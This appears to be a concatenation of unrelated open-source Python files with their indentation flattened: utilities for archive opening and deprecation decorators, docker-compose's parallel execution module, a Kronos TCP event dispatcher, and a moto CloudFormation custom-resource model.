if mode in ('r', 'a', 'w'):
mode += 'b'
elif mode not in ('rb', 'ab', 'wb'):
raise ValueError('Invalid mode: "{0}"'.format(mode))
if use_extension:
# if '.' not in filename, it'll be 1 character long but otherwise
# contain the period
extension = filename[filename.rfind('.'):][1:]
else:
if mode != 'rb':
raise ValueError('Magic number detection only when reading')
with open(filename, 'rb') as f:
magic_number = f.read(8)
if magic_number.startswith(b'BZh'):
extension = 'bz2'
elif magic_number.startswith(b'\x1F\x8B\x08'):
extension = 'gz'
elif magic_number.startswith(b"7z\xBC\xAF'\x1C"):
extension = '7z'
else:
extension = ''
if extension == 'bz2':
if isinstance(bz2, ImportError):
raise bz2
return wrap(bz2.BZ2File(filename, mode), 1)
elif extension == 'gz':
return wrap(gzip.open(filename, mode), 0)
elif extension == '7z':
if mode != 'rb':
raise NotImplementedError('It is not possible to write a 7z file.')
try:
process = subprocess.Popen(['7za', 'e', '-bd', '-so', filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=65535)
except OSError:
raise ValueError('7za is not installed or cannot '
'uncompress "{0}"'.format(filename))
else:
stderr = process.stderr.read()
process.stderr.close()
if stderr != b'':
process.stdout.close()
raise OSError(
'Unexpected STDERR output from 7za {0}'.format(stderr))
else:
return process.stdout
else:
# assume it's an uncompressed file
return open(filename, 'rb')
def merge_unique_dicts(*args, **kwargs):
"""
Return a merged dict, making sure that the original dicts had unique keys.
The positional arguments are the dictionaries to be merged. It is also
possible to define an additional dict using the keyword arguments.
"""
args = list(args) + [dict(kwargs)]
conflicts = set()
result = {}
for arg in args:
conflicts |= set(arg.keys()) & set(result.keys())
result.update(arg)
if conflicts:
raise ValueError('Multiple dicts contain the same keys: '
'{0}'.format(', '.join(sorted(unicode(key) for key in conflicts))))
return result
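# Illustrative sketch (assumed example values):
#
#     merge_unique_dicts({'a': 1}, {'b': 2}, c=3)  # -> {'a': 1, 'b': 2, 'c': 3}
#     merge_unique_dicts({'a': 1}, {'a': 2})       # raises ValueError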
# Decorators
#
# Decorator functions without parameters are _invoked_ differently from
# decorator functions with function syntax. For example, @deprecated causes
# a different invocation to @deprecated().
# The former is invoked with the decorated function as args[0].
# The latter is invoked with the decorator arguments as *args & **kwargs,
# and it must return a callable which will be invoked with the decorated
# function as args[0].
# The follow deprecators may support both syntax, e.g. @deprecated and
# @deprecated() both work. In order to achieve that, the code inspects
# args[0] to see if it callable. Therefore, a decorator must not accept
# only one arg, and that arg be a callable, as it will be detected as
# a deprecator without any arguments.
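# Illustrative sketch of the two invocation styles described above
# (function names are assumptions for the example):
#
#     @deprecated                        # invoked as deprecated(func)
#     def old_helper():
#         pass
#
#     @deprecated(instead='new_helper')  # invoked as deprecated(instead=...),
#     def old_helper2():                 # which returns the real decorator
#         pass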
def signature(obj):
"""
Safely return function Signature object (PEP 362).
inspect.signature was introduced in 3.3, however backports are available.
In Python 3.3, it does not support all types of callables, and should
not be relied upon. Python 3.4 works correctly.
Any exception calling inspect.signature is ignored and None is returned.
@param obj: Function to inspect
@type obj: callable
@rtype: inspect.Signature or None
"""
try:
return inspect.signature(obj)
except (AttributeError, ValueError):
return None
def add_decorated_full_name(obj, stacklevel=1):
"""Extract full object name, including class, and store in __full_name__.
This must be done on all decorators that are chained together, otherwise
the second decorator will have the wrong full name.
@param obj: A object being decorated
@type obj: object
@param stacklevel: level to use
@type stacklevel: int
"""
if hasattr(obj, '__full_name__'):
return
# The current frame is add_decorated_full_name
# The next frame is the decorator
# The next frame is the object being decorated
frame = sys._getframe(stacklevel + 1)
class_name = frame.f_code.co_name
if class_name and class_name != '<module>':
obj.__full_name__ = (obj.__module__ + '.' +
class_name + '.' +
obj.__name__)
else:
obj.__full_name__ = (obj.__module__ + '.' +
obj.__name__)
def manage_wrapping(wrapper, obj):
"""Add attributes to wrapper and wrapped functions."""
wrapper.__doc__ = obj.__doc__
wrapper.__name__ = obj.__name__
wrapper.__module__ = obj.__module__
wrapper.__signature__ = signature(obj)
if not hasattr(obj, '__full_name__'):
add_decorated_full_name(obj, 2)
wrapper.__full_name__ = obj.__full_name__
# Use the previous wrappers depth, if it exists
wrapper.__depth__ = getattr(obj, '__depth__', 0) + 1
# Obtain the wrapped object from the previous wrapper
wrapped = getattr(obj, '__wrapped__', obj)
wrapper.__wrapped__ = wrapped
# Increment the number of wrappers
if hasattr(wrapped, '__wrappers__'):
wrapped.__wrappers__ += 1
else:
wrapped.__wrappers__ = 1
def get_wrapper_depth(wrapper):
"""Return depth of wrapper function."""
return wrapper.__wrapped__.__wrappers__ + (1 - wrapper.__depth__)
def add_full_name(obj):
"""
A decorator to add __full_name__ to the function being decorated.
This should be done for all decorators used in pywikibot, as any
decorator that does not add __full_name__ will prevent other
decorators in the same chain from being able to obtain it.
This can be used to monkey-patch decorators in other modules.
e.g.
<xyz>.foo = add_full_name(<xyz>.foo)
@param obj: The function to decorate
@type obj: callable
@return: decorating function
@rtype: function
"""
def outer_wrapper(*outer_args, **outer_kwargs):
"""Outer wrapper.
The outer wrapper may be the replacement function if the decorated
decorator was called without arguments, or the replacement decorator
if the decorated decorator was called with arguments.
@param outer_args: args
@type outer_args: list
@param outer_kwargs: kwargs
@type outer_kwargs: dict
"""
def inner_wrapper(*args, **kwargs):
"""Replacement function.
If the decorator supported arguments, they are in outer_args,
and this wrapper is used to process the args which belong to
the function that the decorated decorator was decorating.
@param args: args passed to the decorated function.
@param kwargs: kwargs passed to the decorated function.
"""
add_decorated_full_name(args[0])
return obj(*outer_args, **outer_kwargs)(*args, **kwargs)
inner_wrapper.__doc__ = obj.__doc__
inner_wrapper.__name__ = obj.__name__
inner_wrapper.__module__ = obj.__module__
inner_wrapper.__signature__ = signature(obj)
# The decorator being decorated may have args, so both
# syntax need to be supported.
if (len(outer_args) == 1 and len(outer_kwargs) == 0 and
callable(outer_args[0])):
add_decorated_full_name(outer_args[0])
return obj(outer_args[0])
else:
return inner_wrapper
if not __debug__:
return obj
return outer_wrapper
def issue_deprecation_warning(name, instead, depth, warning_class=None):
"""Issue a deprecation warning."""
if instead:
if warning_class is None:
warning_class = DeprecationWarning
warn(u'{0} is deprecated; use {1} instead.'.format(name, instead),
warning_class, depth + 1)
else:
if warning_class is None:
warning_class = _NotImplementedWarning
warn('{0} is deprecated.'.format(name), warning_class, depth + 1)
@add_full_name
def deprecated(*args, **kwargs):
"""Decorator to output a deprecation warning.
@kwarg instead: if provided, will be used to specify the replacement
@type instead: string
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*args, **kwargs):
"""Replacement function.
@param args: args passed to the decorated function.
@type args: list
@param kwargs: kwargs passed to the decorated function.
@type kwargs: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
issue_deprecation_warning(name, instead, depth)
return obj(*args, **kwargs)
def add_docstring(wrapper):
"""Add a Deprecated notice to the docstring."""
deprecation_notice = 'Deprecated'
if instead:
deprecation_notice += '; use ' + instead + ' instead'
deprecation_notice += '.\n\n'
if wrapper.__doc__: # Append old docstring after the notice
wrapper.__doc__ = deprecation_notice + wrapper.__doc__
else:
wrapper.__doc__ = deprecation_notice
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
# Regular expression to find existing deprecation notices
deprecated_notice = re.compile(r'(^|\s)DEPRECATED[.:;,]',
re.IGNORECASE)
# Add the deprecation notice to the docstring if not present
if not wrapper.__doc__:
add_docstring(wrapper)
else:
if not deprecated_notice.search(wrapper.__doc__):
add_docstring(wrapper)
else:
# Get docstring up to @params so deprecation notices for
# parameters don't disrupt it
trim_params = re.compile(r'^.*?((?=@param)|$)', re.DOTALL)
trimmed_doc = trim_params.match(wrapper.__doc__).group(0)
if not deprecated_notice.search(trimmed_doc): # No notice
add_docstring(wrapper)
return wrapper
without_parameters = len(args) == 1 and len(kwargs) == 0 and callable(args[0])
if 'instead' in kwargs:
instead = kwargs['instead']
elif not without_parameters and len(args) == 1:
instead = args[0]
else:
instead = False
# When called as @deprecated, return a replacement function
if without_parameters:
if not __debug__:
return args[0]
return decorator(args[0])
# Otherwise return a decorator, which returns a replacement function
else:
return decorator
def deprecate_arg(old_arg, new_arg):
"""Decorator to declare old_arg deprecated and replace it with new_arg."""
return deprecated_args(**{old_arg: new_arg})
def deprecated_args(**arg_pairs):
"""
Decorator to declare multiple args deprecated.
@param arg_pairs: Each entry points to the new argument name. With True or
None it drops the value and prints a warning. If False it just drops
the value.
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@type __args: list
@param __kw: kwargs passed to the decorated function
@type __kw: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
for old_arg, new_arg in arg_pairs.items():
output_args = {
'name': name,
'old_arg': old_arg,
'new_arg': new_arg,
}
if old_arg in __kw:
if new_arg not in [True, False, None]:
if new_arg in __kw:
warn(u"%(new_arg)s argument of %(name)s "
u"replaces %(old_arg)s; cannot use both."
% output_args,
RuntimeWarning, depth)
else:
# If the value is positionally given this will
# cause a TypeError, which is intentional
warn(u"%(old_arg)s argument of %(name)s "
u"is deprecated; use %(new_arg)s instead."
% output_args,
DeprecationWarning, depth)
__kw[new_arg] = __kw[old_arg]
else:
if new_arg is False:
cls = PendingDeprecationWarning
else:
cls = DeprecationWarning
warn(u"%(old_arg)s argument of %(name)s is deprecated."
% output_args,
cls, depth)
del __kw[old_arg]
return obj(*__args, **__kw)
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
if wrapper.__signature__:
# Build a new signature with deprecated args added.
# __signature__ is only available in Python 3 which has OrderedDict
params = OrderedDict()
for param in wrapper.__signature__.parameters.values():
params[param.name] = param.replace()
for old_arg, new_arg in arg_pairs.items():
params[old_arg] = inspect.Parameter(
old_arg, kind=inspect._POSITIONAL_OR_KEYWORD,
default='[deprecated name of ' + new_arg + ']'
if new_arg not in [True, False, None]
else NotImplemented)
wrapper.__signature__ = inspect.Signature()
wrapper.__signature__._parameters = params
return wrapper
return decorator
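# Illustrative sketch of deprecated_args (names are assumptions):
#
#     @deprecated_args(foo='bar')    # the 'foo' keyword is renamed to 'bar'
#     def func(bar=None):
#         return bar
#
#     func(foo=1)   # warns that 'foo' is deprecated and forwards bar=1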
def remove_last_args(arg_names):
"""
Decorator to declare all args additionally provided deprecated.
All positional arguments appearing after the normal arguments are marked
deprecated. It marks also all keyword arguments present in arg_names as
deprecated. Any arguments (positional or keyword) which are not present in
arg_names are forwarded. For example, a call with 3 parameters where the
original function requests one and arg_names contains one name will result
in an error, because the function effectively got called with 2 parameters.
The decorated function may not use C{*args} or C{**kwargs}.
@param arg_names: The names of all arguments.
@type arg_names: iterable; for the most explanatory message it should
retain the given order (so not a set for example).
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@type __args: list
@param __kw: kwargs passed to the decorated function
@type __kw: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
args, varargs, kwargs, _ = getargspec(wrapper.__wrapped__)
if varargs is not None or kwargs is not None:
raise ValueError('{0} may not have * or ** args.'.format(
name))
deprecated = set(__kw) & set(arg_names)
if len(__args) > len(args):
deprecated.update(arg_names[:len(__args) - len(args)])
# remove at most |arg_names| entries from the back
new_args = tuple(__args[:max(len(args), len(__args) - len(arg_names))])
new_kwargs = dict((arg, val) for arg, val in __kw.items()
if arg not in arg_names)
if deprecated:
# sort them according to arg_names
deprecated = [arg for arg in arg_names if arg in deprecated]
warn(u"The trailing arguments ('{0}') of {1} are deprecated. "
u"The value(s) provided for '{2}' have been dropped.".
format("', '".join(arg_names),
name,
"', '".join(deprecated)),
DeprecationWarning, depth)
return obj(*new_args, **new_kwargs)
manage_wrapping(wrapper, obj)
return wrapper
return decorator
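# Illustrative sketch of remove_last_args (names are assumptions):
#
#     @remove_last_args(['baz'])
#     def func(foo):
#         return foo
#
#     func(1, 2)   # warns; the trailing value 2 ('baz') is dropped -> func(1)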
def redirect_func(target, source_module=None, target_module=None,
old_name=None, class_name=None):
"""
Return a function which can be used to redirect to 'target'.
It also acts like marking that function deprecated and copies all
parameters.
@param target: The targeted function which is to be executed.
@type target: callable
@param source_module: The module of the old function. If '.' defaults
to target_module. If 'None' (default) it tries to guess it from the
executing function.
@type source_module: basestring
@param target_module: The module of the target function. If
'None' (default) it tries to get it from the target. Might not work
with nested classes.
@type target_module: basestring
@param old_name: The old function name. If None it uses the name of the
new function.
@type old_name: basestring
@param class_name: The name of the class. It's added to the target and
source module (separated by a '.').
@type class_name: basestring
@return: A new function which adds a warning prior to each execution.
@rtype: callable
"""
def call(*a, **kw):
issue_deprecation_warning(old_name, new_name, 2)
return target(*a, **kw)
if target_module is None:
target_module = target.__module__
if target_module and target_module[-1] != '.':
target_module += '.'
if source_module == '.':
source_module = target_module
elif source_module and source_module[-1] != '.':
source_module += '.'
else:
source_module = sys._getframe(1).f_globals['__name__'] + '.'
if class_name:
target_module += class_name + '.'
source_module += class_name + '.'
old_name = source_module + (old_name or target.__name__)
new_name = target_module + target.__name__
if not __debug__:
return target
return call
class ModuleDeprecationWrapper(types.ModuleType):
"""A wrapper for a module to deprecate classes or variables of it."""
def __init__(self, module):
"""
Initialise the wrapper.
It will automatically overwrite the module with this instance in
C{sys.modules}.
@param module: The module name or instance
@type module: str or module
"""
if isinstance(module, basestring):
module = sys.modules[module]
super(ModuleDeprecationWrapper, self).__setattr__('_deprecated', {})
super(ModuleDeprecationWrapper, self).__setattr__('_module', module)
self.__dict__.update(module.__dict__)
if __debug__:
sys.modules[module.__name__] = self
def _add_deprecated_attr(self, name, replacement=None,
replacement_name=None, warning_message=None):
"""
Add the name to the local deprecated names dict.
@param name: The name of the deprecated class or variable. It may not
be already deprecated.
@type name: str
@param replacement: The replacement value which should be returned
instead. If the name is already an attribute of that module this
must be None. If None it'll return the attribute of the module.
@type replacement: any
@param replacement_name: The name of the new replaced value. Required
if C{replacement} is not None and it has no __name__ attribute.
If it contains a '.', it will be interpreted as a Python dotted
object name, and evaluated when the deprecated object is needed.
@type replacement_name: str
@param warning_message: The warning to display, with positional
variables: {0} = module, {1} = attribute name, {2} = replacement.
@type warning_message: basestring
"""
if '.' in name:
raise ValueError('Deprecated name "{0}" may not contain '
'".".'.format(name))
if name in self._deprecated:
raise ValueError('Name "{0}" is already deprecated.'.format(name))
if replacement is not None and hasattr(self._module, name):
raise ValueError('Module has already an attribute named '
'"{0}".'.format(name))
if replacement_name is None:
if hasattr(replacement, '__name__'):
replacement_name = replacement.__module__
if hasattr(replacement, '__self__'):
replacement_name += '.'
replacement_name += replacement.__self__.__class__.__name__
replacement_name += '.' + replacement.__name__
else:
raise TypeError('Replacement must have a __name__ attribute '
'or a replacement name must be set '
'specifically.')
if not warning_message:
if replacement_name:
warning_message = '{0}.{1} is deprecated; use {2} instead.'
else:
warning_message = u"{0}.{1} is deprecated."
self._deprecated[name] = replacement_name, replacement, warning_message
def __setattr__(self, attr, value):
"""Set the value of the wrapped module."""
self.__dict__[attr] = value
setattr(self._module, attr, value)
def __getattr__(self, attr):
"""Return the attribute with a deprecation warning if required."""
if attr in self._deprecated:
warning_message = self._deprecated[attr][2]
warn(warning_message.format(self._module.__name__, attr,
self._deprecated[attr][0]),
DeprecationWarning, 2)
if self._deprecated[attr][1]:
return self._deprecated[attr][1]
elif '.' in self._deprecated[attr][0]:
try:
package_name = self._deprecated[attr][0].split('.', 1)[0]
module = __import__(package_name)
context = {package_name: module}
replacement = eval(self._deprecated[attr][0], context)
self._deprecated[attr] = (
self._deprecated[attr][0],
replacement,
self._deprecated[attr][2]
)
return replacement
except Exception:
pass
return getattr(self._module, attr)
@deprecated('open_archive()')
def open_compressed(filename, use_extension=False):
"""DEPRECATED: Open a file and uncompress it if needed."""
return open_archive(filename, use_extension=use_extension)
def file_mode_checker(filename, mode=0o600):
"""Check file mode and update it, if needed.
@param filename: filename path
@type filename: basestring
@param mode: requested file mode
@type mode: int
"""
warn_str = 'File {0} had {1:o} mode; converted to {2:o} mode.'
st_mode = os.stat(filename).st_mode
if stat.S_ISREG(st_mode) and (st_mode - stat.S_IFREG != mode):
os.chmod(filename, mode)
# re-read and check changes
if os.stat(filename).st_mode != st_mode:
warn(warn_str.format(filename, st_mode - stat.S_IFREG, mode))
def compute_file_hash(filename, sha='sha1', bytes_to_read=None):
"""Compute file hash.
Result is expressed as hexdigest().
@param filename: filename path
@type filename: basestring
@param sha: hashing function among the following in hashlib:
md5(), sha1(), sha224(), sha256(), sha384(), and sha512();
the function name shall be passed as a string, e.g. 'sha1'.
@type sha: basestring
@param bytes_to_read: only the first bytes_to_read will be considered;
if file size is smaller, the whole file will be considered.
@type bytes_to_read: None or int
"""
size = os.path.getsize(filename)
if bytes_to_read is None:
bytes_to_read = size
else:
bytes_to_read = min(bytes_to_read, size)
step = 1 << 20
shas = ['md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']
assert sha in shas
sha = getattr(hashlib, sha)() # sha instance
with open(filename, 'rb') as f:
while bytes_to_read > 0:
read_bytes = f.read(min(bytes_to_read, step))
assert read_bytes # make sure we actually read bytes
bytes_to_read -= len(read_bytes)
sha.update(read_bytes)
return sha.hexdigest()
|
parallel.py
|
from __future__ import absolute_import
from __future__ import unicode_literals
import logging
import operator
import sys
from threading import Lock
from threading import Semaphore
from threading import Thread
from docker.errors import APIError
from docker.errors import ImageNotFound
from six.moves import _thread as thread
from six.moves.queue import Empty
from six.moves.queue import Queue
from compose.cli.colors import green
from compose.cli.colors import red
from compose.cli.signals import ShutdownException
from compose.const import PARALLEL_LIMIT
from compose.errors import HealthCheckFailed
from compose.errors import NoHealthCheckConfigured
from compose.errors import OperationFailedError
from compose.utils import get_output_stream
log = logging.getLogger(__name__)
STOP = object()
class GlobalLimit(object):
"""Simple class to hold a global semaphore limiter for a project. This class
should be treated as a singleton that is instantiated when the project is.
"""
global_limiter = Semaphore(PARALLEL_LIMIT)
@classmethod
def set_global_limit(cls, value):
if value is None:
value = PARALLEL_LIMIT
cls.global_limiter = Semaphore(value)
def parallel_execute_watch(events, writer, errors, results, msg, get_name):
""" Watch events from a parallel execution, update status and fill errors and results.
Returns exception to re-raise.
"""
error_to_reraise = None
for obj, result, exception in events:
if exception is None:
writer.write(msg, get_name(obj), 'done', green)
results.append(result)
elif isinstance(exception, ImageNotFound):
# This is to bubble up ImageNotFound exceptions to the client so we
# can prompt the user if they want to rebuild.
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
error_to_reraise = exception
elif isinstance(exception, APIError):
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, (OperationFailedError, HealthCheckFailed, NoHealthCheckConfigured)):
errors[get_name(obj)] = exception.msg
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, UpstreamError):
writer.write(msg, get_name(obj), 'error', red)
else:
errors[get_name(obj)] = exception
error_to_reraise = exception
return error_to_reraise
def parallel_execute(objects, func, get_name, msg, get_deps=None, limit=None):
"""Runs func on objects in parallel while ensuring that func is
ran on object only after it is ran on all its dependencies.
get_deps called on object must return a collection with its dependencies.
get_name called on object must return its name.
"""
objects = list(objects)
stream = get_output_stream(sys.stderr)
if ParallelStreamWriter.instance:
writer = ParallelStreamWriter.instance
else:
writer = ParallelStreamWriter(stream)
for obj in objects:
writer.add_object(msg, get_name(obj))
for obj in objects:
writer.write_initial(msg, get_name(obj))
events = parallel_execute_iter(objects, func, get_deps, limit)
errors = {}
results = []
error_to_reraise = parallel_execute_watch(events, writer, errors, results, msg, get_name)
for obj_name, error in errors.items():
stream.write("\nERROR: for {} {}\n".format(obj_name, error))
if error_to_reraise:
raise error_to_reraise
return results, errors
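# Illustrative usage sketch (the objects and callables are assumptions):
#
#     results, errors = parallel_execute(
#         objects=containers,
#         func=operator.methodcaller('start'),
#         get_name=operator.attrgetter('name'),
#         msg='Starting',
#     )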
def _no_deps(x):
return []
class State(object):
"""
Holds the state of a partially-complete parallel operation.
state.started: objects being processed
state.finished: objects which have been processed
state.failed: objects which either failed or whose dependencies failed
"""
def __init__(self, objects):
self.objects = objects
self.started = set()
self.finished = set()
self.failed = set()
def is_done(self):
return len(self.finished) + len(self.failed) >= len(self.objects)
def pending(self):
return set(self.objects) - self.started - self.finished - self.failed
class NoLimit(object):
def __enter__(self):
pass
def __exit__(self, *ex):
pass
def parallel_execute_iter(objects, func, get_deps, limit):
"""
Runs func on objects in parallel while ensuring that func is
run on an object only after it has been run on all its dependencies.
Returns an iterator of tuples which look like:
# if func returned normally when run on object
(object, result, None)
# if func raised an exception when run on object
(object, None, exception)
# if func raised an exception when run on one of object's dependencies
(object, None, UpstreamError())
"""
if get_deps is None:
get_deps = _no_deps
if limit is None:
limiter = NoLimit()
else:
limiter = Semaphore(limit)
results = Queue()
state = State(objects)
while True:
feed_queue(objects, func, get_deps, results, state, limiter)
try:
event = results.get(timeout=0.1)
except Empty:
continue
# See https://github.com/docker/compose/issues/189
except thread.error:
raise ShutdownException()
if event is STOP:
break
obj, _, exception = event
if exception is None:
log.debug('Finished processing: {}'.format(obj))
state.finished.add(obj)
else:
log.debug('Failed: {}'.format(obj))
state.failed.add(obj)
yield event
def producer(obj, func, results, limiter):
"""
The entry point for a producer thread which runs func on a single object.
Places a tuple on the results queue once func has either returned or raised.
"""
with limiter, GlobalLimit.global_limiter:
try:
result = func(obj)
results.put((obj, result, None))
except Exception as e:
results.put((obj, None, e))
def feed_queue(objects, func, get_deps, results, state, limiter):
"""
Starts producer threads for any objects which are ready to be processed
(i.e. they have no dependencies which haven't been successfully processed).
Shortcuts any objects whose dependencies have failed and places an
(object, None, UpstreamError()) tuple on the results queue.
"""
pending = state.pending()
log.debug('Pending: {}'.format(pending))
for obj in pending:
deps = get_deps(obj)
try:
if any(dep[0] in state.failed for dep in deps):
log.debug('{} has upstream errors - not processing'.format(obj))
results.put((obj, None, UpstreamError()))
state.failed.add(obj)
elif all(
dep not in objects or (
dep in state.finished and (not ready_check or ready_check(dep))
) for dep, ready_check in deps
):
log.debug('Starting producer thread for {}'.format(obj))
t = Thread(target=producer, args=(obj, func, results, limiter))
t.daemon = True
t.start()
state.started.add(obj)
except (HealthCheckFailed, NoHealthCheckConfigured) as e:
log.debug(
'Healthcheck for service(s) upstream of {} failed - '
'not processing'.format(obj)
)
results.put((obj, None, e))
if state.is_done():
results.put(STOP)
class UpstreamError(Exception):
pass
class ParallelStreamWriter(object):
"""Write out messages for operations happening in parallel.
Each operation has its own line, and ANSI code characters are used
to jump to the correct line, and write over the line.
"""
noansi = False
lock = Lock()
instance = None
@classmethod
def set_noansi(cls, value=True):
cls.noansi = value
def __init__(self, stream):
self.stream = stream
self.lines = []
self.width = 0
ParallelStreamWriter.instance = self
def add_object(self, msg, obj_index):
if msg is None:
return
self.lines.append(msg + obj_index)
self.width = max(self.width, len(msg + ' ' + obj_index))
def write_initial(self, msg, obj_index):
if msg is None:
return
return self._write_noansi(msg, obj_index, '')
def _write_ansi(self, msg, obj_index, status):
self.lock.acquire()
position = self.lines.index(msg + obj_index)
diff = len(self.lines) - position
# move up
self.stream.write("%c[%dA" % (27, diff))
# erase
self.stream.write("%c[2K\r" % 27)
self.stream.write("{:<{width}} ... {}\r".format(msg + ' ' + obj_index,
status, width=self.width))
# move back down
self.stream.write("%c[%dB" % (27, diff))
self.stream.flush()
self.lock.release()
def _write_noansi(self, msg, obj_index, status):
self.stream.write(
"{:<{width}} ... {}\r\n".format(
msg + ' ' + obj_index, status, width=self.width
)
)
self.stream.flush()
def write(self, msg, obj_index, status, color_func):
if msg is None:
return
if self.noansi:
self._write_noansi(msg, obj_index, status)
else:
self._write_ansi(msg, obj_index, color_func(status))
def parallel_operation(containers, operation, options, message):
parallel_execute(
containers,
operator.methodcaller(operation, **options),
operator.attrgetter('name'),
message,
)
def parallel_remove(containers, options):
stopped_containers = [c for c in containers if not c.is_running]
parallel_operation(stopped_containers, 'remove', options, 'Removing')
def parallel_pause(containers, options):
parallel_operation(containers, 'pause', options, 'Pausing')
def parallel_unpause(containers, options):
parallel_operation(containers, 'unpause', options, 'Unpausing')
def parallel_kill(containers, options):
parallel_operation(containers, 'kill', options, 'Killing')
|
dispatcher.py
|
# (C) Copyright 1996-2018 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation nor
# does it submit to any jurisdiction.
import queue
import logging
import multiprocessing
import socket
from datetime import datetime
from kronos_executor.kronos_events import EventFactory
logger = logging.getLogger(__name__)
class EventDispatcher(object):
"""
Class that dispatches Kronos events
"""
buffer_size = 4096
def __init__(self, queue, server_host='localhost', server_port=7363, sim_token=None):
"""
Setup the socket and bind it to the appropriate port
"""
# full address of the server
self.server_host = server_host
self.server_port = server_port
self.server_address = (server_host, server_port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# bind it to port and set it to listen status
self.sock.bind(self.server_address)
self.sock.listen(1024)
self.terminate = False
# Unique simulation hash
self.sim_token = sim_token
# listener process
self.listener_queue = queue
self.listener_proc = multiprocessing.Process(target=self._listen_for_messages)
# log of all events with timings taken upon msg reception
self.timed_events = []
def __str__(self):
return "KRONOS-DISPATCHER: host:{}, port:{} ".format(self.server_host, self.server_port)
def __bytes__(self):
return str(self).encode('utf-8')
def start(self):
"""
Start the process
:return:
"""
self.listener_proc.start()
def _listen_for_messages(self):
"""
Handles the incoming TCP events
:return:
"""
# keep accepting connections until all the jobs have completed
while True:
connection, client_address = self.sock.accept()
try:
msg = b""
# keep looping until there is data to be received..
while True:
data = connection.recv(self.buffer_size)
if data:
msg += data
else:
# store event and timestamp in the queue (and wait until there is space in the queue)
self.listener_queue.put((msg, datetime.now().timestamp()), block=True)
break
finally:
# ..and close the connection
connection.close()
def get_next_message(self):
return self.listener_queue.get()
def get_events_batch(self, batch_size=1):
"""
Get a batch of events
:param batch_size:
:return:
"""
_batch = []
queue_empty_reached = False
try:
while len(_batch) < batch_size:
# get msg and timestamp from the queue
(msg, msg_timestamp) = self.listener_queue.get(block=False)
kronos_event = EventFactory.from_string(msg, validate_event=False)
if kronos_event:
# Dispatch only legitimate messages (i.e. TOKEN present and correct)
if hasattr(kronos_event, "token"):
if str(kronos_event.token) == str(self.sim_token):
_batch.append(kronos_event)
self.timed_events.append((kronos_event, msg_timestamp))
else:
logger.warning("INCORRECT TOKEN {} => message discarded: {}".format(kronos_event.token, msg))
else:
# one last attempt to find the token
# TODO: ideally we would keep the check of the token at the top level only..
if hasattr(kronos_event, "info"):
if kronos_event.info.get("token", "") == str(self.sim_token):
_batch.append(kronos_event)
self.timed_events.append((kronos_event, msg_timestamp))
else:
logger.warning("TOKEN NOT found => message discarded: {}".format(msg))
else:
logger.warning("TOKEN NOT found => message discarded: {}".format(msg))
except queue.Empty:
queue_empty_reached = True
pass
return queue_empty_reached, _batch
def stop(self):
self.listener_proc.terminate()
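# Illustrative usage sketch (host, port and token values are assumptions):
#
#     event_queue = multiprocessing.Queue()
#     dispatcher = EventDispatcher(event_queue, server_host='localhost',
#                                  server_port=7363, sim_token='sim-token')
#     dispatcher.start()
#     queue_empty, events = dispatcher.get_events_batch(batch_size=10)
#     dispatcher.stop()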
|
custom_model.py
|
import json
import threading
from moto import settings
from moto.core.models import CloudFormationModel
from moto.awslambda import lambda_backends
from uuid import uuid4
class CustomModel(CloudFormationModel):
def __init__(self, region_name, request_id, logical_id, resource_name):
self.region_name = region_name
self.request_id = request_id
self.logical_id = logical_id
self.resource_name = resource_name
self.data = dict()
self._finished = False
def set_data(self, data):
self.data = data
self._finished = True
def is_created(self):
return self._finished
@property
def physical_resource_id(self):
return self.resource_name
@staticmethod
def cloudformation_type():
return "?"
@classmethod
def create_from_cloudformation_json(
cls, resource_name, cloudformation_json, region_name, **kwargs
):
logical_id = kwargs["LogicalId"]
stack_id = kwargs["StackId"]
resource_type = kwargs["ResourceType"]
properties = cloudformation_json["Properties"]
service_token = properties["ServiceToken"]
backend = lambda_backends[region_name]
fn = backend.get_function(service_token)
request_id = str(uuid4())
custom_resource = CustomModel(
region_name, request_id, logical_id, resource_name
)
from moto.cloudformation import cloudformation_backends
stack = cloudformation_backends[region_name].get_stack(stack_id)
stack.add_custom_resource(custom_resource)
# A request will be sent to this URL to indicate success/failure
# This request will be coming from inside a Docker container
# Note that, in order to reach the Moto host, the Moto-server should be listening on 0.0.0.0
#
# Alternative: Maybe we should let the user pass in a container-name where Moto is running?
# Similar to how we know for sure that the container in our CI is called 'motoserver'
host = f"{settings.moto_server_host()}:{settings.moto_server_port()}"
response_url = (
f"{host}/cloudformation_{region_name}/cfnresponse?stack={stack_id}"
)
event = {
"RequestType": "Create",
"ServiceToken": service_token,
"ResponseURL": response_url,
"StackId": stack_id,
"RequestId": request_id,
"LogicalResourceId": logical_id,
"ResourceType": resource_type,
"ResourceProperties": properties,
}
invoke_thread = threading.Thread(
target=fn.invoke, args=(json.dumps(event), {}, {})
)
invoke_thread.start()
return custom_resource
@classmethod
def has_cfn_attr(cls, attr): # pylint: disable=unused-argument
# We don't know which attributes are supported for third-party resources
return True
def get_cfn_attribute(self, attribute_name):
if attribute_name in self.data:
return self.data[attribute_name]
return None
|
roomba.py
|
